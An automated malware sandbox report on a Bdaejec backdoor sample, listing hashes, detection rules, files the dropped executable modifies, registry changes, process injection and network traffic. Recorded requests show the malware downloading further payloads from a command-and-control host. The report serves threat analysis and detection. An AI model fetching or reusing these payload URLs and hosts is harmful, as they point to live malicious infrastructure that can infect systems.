bdaejec | f1513638f27dbef989b971e747181c330b52535a90f0dff671140fe92d9a051d

Analysis

max time kernel
144s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/02/2025, 23:22 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Size

3.2MB
MD5

81b09f869abfbe97b335cf30bfab35c4
SHA1

5c25b6f6b8f6d95256634f42b1182d740ab9ea69
SHA256

f1513638f27dbef989b971e747181c330b52535a90f0dff671140fe92d9a051d
SHA512

d63e5505c1e104e1ef9d7d67cb6f3577f60e03d6aadd5a4c2dbcdd8cd24e12664d8d784cbb992085118092860310d7d6648dfae5b919b3266a3031b1491772eb
SSDEEP

24576:x7X9ZnkBaAowFmVOjICqdeTSotoA010F/FYtDcLzWsV6qLEs2CHzZcteCrQP1eI:9TnkXoymVerOtovrmsdCv+

Score

10^/10

bdaejec aspackv2 backdoor discovery

Malware Config

Extracted

Family

bdaejec

ddos.dnsnb8.net

Signatures

Bdaejec
Bdaejec is a backdoor written in C++.
backdoor bdaejec
Bdaejec family
bdaejec

Detects Bdaejec Backdoor. 1 IoCs

Bdaejec is backdoor written in C++.

resource	yara_rule
behavioral1/memory/1736-36-0x0000000001330000-0x0000000001339000-memory.dmp	family_bdaejec_backdoor

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0009000000012281-8.dat	aspack_v212_v242

Executes dropped EXE 1 IoCs

pid	Process
1736	gQvCdZ.exe

Loads dropped DLL 2 IoCs

pid	Process
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GRAPH.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jp2launcher.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\Solitaire.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javacpl.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\servertool.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\rmid.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\klist.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateComRegisterShell64.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\WinMail.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\policytool.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ssvagent.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\kinit.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Windows Journal\Journal.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateOnDemand.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSTORDB.EXE	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe	gQvCdZ.exe
File opened for modification	C:\Program Files\Java\jre7\bin\pack200.exe	gQvCdZ.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gQvCdZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 30 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewVersion = "0"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 1736	1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe	30
PID 1732 wrote to memory of 1736	1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe	30
PID 1732 wrote to memory of 1736	1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe	30
PID 1732 wrote to memory of 1736	1732	2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe	30
PID 1736 wrote to memory of 2208	1736	gQvCdZ.exe	32
PID 1736 wrote to memory of 2208	1736	gQvCdZ.exe	32
PID 1736 wrote to memory of 2208	1736	gQvCdZ.exe	32
PID 1736 wrote to memory of 2208	1736	gQvCdZ.exe	32

C:\Users\Admin\AppData\Local\Temp\2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-01_81b09f869abfbe97b335cf30bfab35c4_smoke-loader_wapomi.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Users\Admin\AppData\Local\Temp\gQvCdZ.exe
  C:\Users\Admin\AppData\Local\Temp\gQvCdZ.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\48cf12da.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2208

Network

DNS

ddos.dnsnb8.net

gQvCdZ.exe

Remote address:

8.8.8.8:53

Request

ddos.dnsnb8.net

IN A

Response

ddos.dnsnb8.net

IN A

44.221.84.105
GET

http://ddos.dnsnb8.net:799/cj//k1.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k1.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k2.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k2.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k2.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k3.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
GET

http://ddos.dnsnb8.net:799/cj//k3.rar

gQvCdZ.exe

Remote address:

44.221.84.105:799

Request

GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k1.rar

http

gQvCdZ.exe

466 B
176 B
3
4

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k1.rar

http

gQvCdZ.exe

558 B
256 B
5
6

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k2.rar

http

gQvCdZ.exe

466 B
176 B
3
4

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k2.rar

http

gQvCdZ.exe

466 B
176 B
3
4

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k2.rar

http

gQvCdZ.exe

558 B
256 B
5
6

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k3.rar

http

gQvCdZ.exe

466 B
176 B
3
4

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k3.rar
44.221.84.105:799

http://ddos.dnsnb8.net:799/cj//k3.rar

http

gQvCdZ.exe

466 B
176 B
3
4

HTTP Request

GET http://ddos.dnsnb8.net:799/cj//k3.rar

8.8.8.8:53

ddos.dnsnb8.net

dns

gQvCdZ.exe

61 B
77 B
1
1

DNS Request

ddos.dnsnb8.net

DNS Response

44.221.84.105

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2B3D641E.exe

Filesize
4B

MD5
20879c987e2f9a916e578386d499f629

SHA1
c7b33ddcc42361fdb847036fc07e880b81935d5d

SHA256
9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

SHA512
bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\48cf12da.bat

Filesize
187B

MD5
910b69d76c4d4e71aa20d84c707a0795

SHA1
0ba5ad1d9e3d9d56565e90b7a3d8602f97de031e

SHA256
9849485e0375dc35e2aaa39d45603abb15f02427ad6153642a7ea68250a5a82d

SHA512
113b6f7c9510883c3d09c9744446eac7dffc891c113b9a17f239c5ca32e90948970481c34d23817d7e023d6720cac7df9008f75ca6d19d9f03208b9c58c3d699

Download Submit
C:\Users\Admin\AppData\Local\Temp\gQvCdZ.exe

Filesize
15KB

MD5
56b2c3810dba2e939a8bb9fa36d3cf96

SHA1
99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

SHA256
4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

SHA512
27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

Download Submit
memory/1732-7-0x0000000000400000-0x000000000082C000-memory.dmp

Filesize
4.2MB

Download
memory/1732-11-0x0000000000230000-0x0000000000239000-memory.dmp

Filesize
36KB

Download
memory/1732-9-0x0000000000230000-0x0000000000239000-memory.dmp

Filesize
36KB

Download
memory/1732-38-0x00000000055B0000-0x00000000055B2000-memory.dmp

Filesize
8KB

Download
memory/1732-39-0x0000000000400000-0x000000000082C000-memory.dmp

Filesize
4.2MB

Download
memory/1732-41-0x0000000000230000-0x0000000000239000-memory.dmp

Filesize
36KB

Download
memory/1732-42-0x0000000000230000-0x0000000000239000-memory.dmp

Filesize
36KB

Download
memory/1736-10-0x0000000001330000-0x0000000001339000-memory.dmp

Filesize
36KB

Download
memory/1736-36-0x0000000001330000-0x0000000001339000-memory.dmp

Filesize
36KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.